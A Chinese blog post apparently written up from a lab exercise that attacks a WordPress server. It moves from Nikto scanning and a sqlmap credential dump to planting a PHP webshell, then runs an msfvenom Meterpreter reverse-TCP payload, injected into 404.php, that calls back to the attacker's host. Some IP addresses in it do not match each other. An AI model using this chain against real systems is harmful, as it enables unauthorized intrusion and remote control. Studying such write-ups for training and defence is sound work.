使用反弹木马进行提权

渗透机:kail  ip:172.16.5.6

靶   机:linux ip:172.16.5.7

客户端:windows XP ip: 172.16.5.128

通过Nikto对服务器80端口进行扫描:

nikto -host http://172.16.1.200 

发现了login.php文件与phpmyadmin/目录

所以直接在浏览器中访问login.php

sqlmap -u “http://172.16.5.7/login.php” --forms --level 3 -D wordpress8080 -T users --dump

 

从这里我们就知道了用户名admin与密码SuperSecretPassword登录后台

接下来利用WordPress进行提权操作,基本上提权的方式有三种:

1.将一句话写到一个文件夹下并压缩成.zip格式上传

2.找到能编辑的php文件,将一句话写进去,然后使用菜刀来连接该一句话木马

3.通过php shell反弹木马并结合Meterpreter实现反弹连接

这里我们尝试以读写的方式生成一个shell.php文件。 

然后使用windows里的中国菜刀来连接木马的地址

 

 利用msf生成一个php格式的反弹木马脚本

msfvenom -p php/meterpreter/reverse_tcp LHOST=172.16.1.100 LPORT=886 -f raw > shell.php

打开msfconsole控制台

先不着急运行模块,先将木马源码复制出来上传到靶机,替换掉服务器的404.php页面内容,再次访问http://172.16.5.7:8080/wordpress/404.php来触发php反弹木马。

运行模块,成功进入后渗透。

 

 

  • 7
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值